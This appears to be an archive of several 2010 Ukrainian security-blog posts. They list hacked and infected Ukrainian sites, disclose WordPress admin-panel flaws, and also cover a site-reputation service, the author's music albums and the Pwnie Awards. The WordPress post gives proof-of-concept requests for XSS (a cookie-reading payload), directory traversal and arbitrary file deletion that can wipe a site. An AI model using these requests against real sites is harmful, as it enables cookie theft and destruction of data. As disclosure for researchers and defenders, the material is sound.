Websecurity - Веб безпека

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти.

Похакані сайти в Уанеті:

• http://plastifikator.vn.ua (хакером Casper_Kae) - 21.09.2010

Файли, що використовуються для RFI атак:

http://plastifikator.vn.ua/file/Ckrid1.txt

Через два місяці після проведення проекту День багів в WordPress 2 (Day of bugs in WordPress 2) я публікую численні уразливості в WordPress. Це в якості попереднього анонсу Дня багів в WordPress 3, який відбудеться з часом .

У серпні, 14.08.2010, я знайшов Cross-Site Scripting, Full path disclosure, Information Leakage, Directory Traversal, Arbitrary File Deletion і Denial of Service уразливості в WordPress.

Для всіх цих атак потрібно мати доступ до адмінського акаунта, або мати акаунт з правами для роботи з плагінами. Або атакувати адміна чи іншого користувача з необхідними правами через XSS, щоб дізнатися токен, призначений для захисту від CSRF атак.

Тому користувачам WordPress особливо переживати за ці дірки не треба (якщо не допускати вищезгаданих вимог). Але дані уразливості стануть в нагоді секюріті дослідникам при доступі до адмінки або наявності XSS на сайті. Тому розробникам WP бажано їх виправити.

Перевірено в WordPress 2.0.11, 2.6.2, 2.7, 2.8, 2.9.2, 3.0.1. Версії 2.0.х невразливі, тому що в них немає даного функціоналу. До різних уразливостей вразливі WordPress 2.6 - 3.0.1 та потенційно попередні версії.

Коментуючи XSS уразливість в WordPress 3.0.1, я зазначив додаткову інформацію стосовно XSS уразливості. Дані нюанси відносяться і до нищенаведених уразливостей. Атакувати можна як черех параметр checked[0], так через checked[1] і т.д., а також через checked[]. В версіях WP 2.7 і вище можна використовувати параметр action=delete-selected, а в версіях 2.8 і вище можна використовувати також параметр action2=delete-selected.

XSS:

Як я зазначав в вищезгаданому записі, в WordPress 2.6.x Cross-Site Scripting атака проводиться по іншому. І користі від даної XSS майже немає.

Для атаки потрібно послати POST запит до http://site/wp-admin/plugins.php з параметрами _wpnonce рівному значенню токена, delete-selected рівному “Delete” та checked[] рівному <body onload=alert(document.cookie)>.

Уразливі WordPress 2.6.x та потенційно попередні версії.

Full path disclosure:

Для атаки потрібно послати POST запит до http://site/wp-admin/plugins.php з параметрами _wpnonce рівному значенню токена, delete-selected рівному “Delete” та checked[] рівному “1″.

Уразливі WordPress 2.6.x та потенційно попередні версії.

Full path disclosure:

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=1

Уразливі WordPress 2.7 - 3.0.1 (для параметра action2 - 2.8 і вище).

Full path disclosure:

http://site/wp-admin/plugins.php

Повний шлях виводиться прямо на сторінці з плагінами.

Уразливі WordPress 2.6 - 2.7.1.

Information Leakage + Directory Traversal:

На сторінці (в списку під лінкою Click to view entire list of files which will be deleted) виводиться перелік файлів в поточній папці та підпапках.

В папці http://site/wp-content/plugins/:
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=

В папці http://site/wp-content/:
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1

Уразливі WordPress 2.7 - 3.0.1 (для параметра action2 - 2.8 і вище). А також WordPress 2.6.х. В версіях 2.6.х потрібно послати відповідний POST запит до http://site/wp-admin/plugins.php (як зазначалось вище).

Arbitrary File Deletion + DoS:

Якщо послати вищенаведені запити з параметром verify-delete=1, то можна видалити файли та папки в поточній папці та підпапках. Враховуючи Directory Traversal можна видалити як всі плагіни, так й інші файли в інших папках, в тому числі можна провести DoS атаку на сайт (якщо видалити важливі файли WP). Наприклад з запитом checked[]=../../1 можна видалити весь сайт.

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1&verify-delete=1
http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1&verify-delete=1

Уразливі WordPress 2.7 - 3.0.1 (для параметра action2 - 2.8 і вище). А також WordPress 2.6.х. В версіях 2.6.х потрібно послати відповідний POST запит до http://site/wp-admin/plugins.php (як зазначалось вище).

Продовжуючи тему антивірусів для сайтів, розповім вам про ще один подібний сервіс. Це WOT - Web of Trust. В деякій мірі це ще один конкурент моїй Web VDS.

Даний сервіс призначений для створення рейтингу довіри до сайтів. В тому числі він може використовуватися для захисту від вірусів на веб сайтах та інших шкідливих сайтів. Він доступний як у вигляді плагіна для браузерів, так і у вигляді онлайн сервіса.

Веб сервіс Web of Trust відрізняється від таких сервісів як McAfee SiteAdvisor, Norton Safe Web від Symantec (хоча є деяка схожість з ними) та інших тим, що він представляє собою не сервіс виявлення шкідливого коду на сайтах, а рейтинг сайтів (де є в тому числі і шкідливі сайти). В цьому він подібний до сервісів Clean MX та DNS-BH – Malware Domain Blocklist.

Щоб скористатися даним сервісом, потрібно зайти на сайт та переглянути перелік сайтів за популярністю, та почитати детальну інформацію про сайт на сторінці WOT Reputation Scorecard (для конкретного сайта). Де може бути вказана інформація про інфікованість конкретного сайта. Або можна скористатися плагіном WOT add-on, що розроблений для багатьох браузерів (Mozilla Firefox, Google Chrome, Internet Explorer, Safari, а також існує букмарклет для інших браузерів).

Можете подитивитися на детальну інформацію про інфікований сайт tipsyking.com:

http://www.mywot.com/en/scorecard/tipsyking.com

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPress Polls та WP-Forum. Для котрих з’явилися експлоіти. WordPress Polls - це плагін для створення голосувань, WP-Forum - це плагін для створення форуму.

• WordPress Polls 2.x Incorrect Flood Filter (деталі)
• WP-Forum <= 2.3 SQL Injection vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://podrujki.org.ua (хакером Dr.SiLnT HilL) - 24.09.2010, зараз сайт вже виправлений адмінами
• http://www.n-steni.com.ua (хакером HoppuS)
• http://vstyle.kiev.ua (хакером Houssem jrad) - 22.09.2010, зараз сайт вже виправлений адмінами
• http://www.elektrodom.sumy.ua (хакером Real_Karizma) - 18.09.2010, зараз сайт не працює
• http://minimen.com.ua (хакерами з Wannabe Hacker Team)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://volleyball.org.ua - інфекція була виявлена 22.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 7 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://pallada.kherson.ua - інфекція була виявлена 17.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 4 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://pallada.ks.ua - інфекція була виявлена 14.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://dpa.kharkov.ua - інфікований державний сайт - інфекція була виявлена 25.09.2010. Зараз сайт не входить до переліку підозрілих.
• http://mybigcash.com - інфекція була виявлена 24.07.2010. Зараз сайт не входить до переліку підозрілих.

Через більш як сім років, після того як я виклав свій перший “майже комерційний” альбом “Жахи”, я нарешті знайшов час, щоб викласти свій новий альбом. І вчора я розмістив мій другий “майже комерційний” альбом “My own Rave World” (Мій власний рейвовий світ). Частина з даних композицій була написана під час створення композицій з альбому “Жахи”, а частина пізніше.

До альбому увійшли 10 композицій, що були створені мною на протязі 1999 - 2001 років. Це наступні композиції:

1. Disconnect
2. It’s a Sonic
3. Keep me free
4. Mad Song
5. Не вмирай
6. Повернення електроніки
7. Сумні думки
8. Welcome to Rave World
9. Welcome to Rave World (mix)
10. З новим тисячоліттям

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://chocolate.lviv.ua (хакером ArTiN) - 14.09.2010, зараз сайт вже виправлений адмінами
• http://maritimelawschool.in.ua (хакерами AtoM і D4nnY) - 06.09.2010, зараз сайт не працює (немає контенту)
• http://www.cvoippo.edu.ua (хакером kaMtiEz) - 20.09.2010, зараз сайт вже виправлений адмінами
• http://nbook.info (хакером Aquantes)
• http://www.avtohifi.com (хакером Top 511) - 06.09.2010, зараз сайт вже виправлений адмінами

В 1998-2002 роках я займався створенням музичних композицій. І за той час я написав багато композицій, серед яких були навіть непогані треки . І частину з усіх моїх композ я зилишив, і деякі з них виклав в Інтернеті на своєму домашньому сайті. Це були ранні мої твори - вони переважно невисокої якості, тому слухати як варто лише при великому бажанні.

Частина композицій була кращої якості ніж інші (та й в них менше використовувалися чужі лупи, а більше власних лупів), тому я їх відніс до категорії комерційних. І в 2000 я розробив свій перший комерційний альбом (з композ створених за останні роки), який я в 2003 році виклав в Інтернеті як некомерційний .

22.04.2003 я виклав на сайті свою Фонову музику - це композиції, які я використовую в якості фонової музики в себе на сайті. Дані 4 композіції були розроблені мною в 1999 році.

А 23.05.2003 я виклав свій перший “майже комерційний” альбом “Жахи”. А сьогодні я виклав свій новий альбом, про який я напишу окремо.

До альбому “Жахи” увійшло 14 композицій, що були створені мною на протязі 1998 - 2000 років. Це наступні композиції:

1. Життя триває
2. Ворухайся
3. Час минає
4. Друг
5. Найшвидший
6. Хлопці-дігери
7. Стрибай і танцюй
8. Музон
9. Нова Ера
10. Suck my bumstick!
11. Найшвидший (мікс)
12. Хочи собі
13. У лісі
14. Suck my bumstick! (мікс)

Наприкінці липня були оголошені переможці Pwnie Awards 2010 - Pwnie Award Winners. 28.07.2010 імена переможців в усіх категоріях було оприлюднено на сайті.

Цьогорічні переможці Pwnie Awards.

Pwnie for Best Server-Side Bug:

• Apache Struts2 framework remote code execution (Meder Kydyraliev)

Pwnie for Best Client-Side Bug:

• Java Trusted Method Chaining (Sami Koivu)

Pwnie for Best Privilege Escalation Bug:

• Windows NT #GP Trap Handler (Tavis Ormandy)

Pwnie for Most Innovative Research:

• Flash Pointer Inference and JIT Spraying (Dionysus Blazakis)

Lamest Vendor Response:

• Absolute Software - LANRev remote code execution

Pwnie for Best Song:

• Pwned - 1337 edition (Dr. Raid and Heavy Pennies)

Pwnie for Most Epic FAIL:

• Microsoft Internet Explorer 8 XSS filter

Можете ознайомитися з переможцями Pwnie Awards 2009.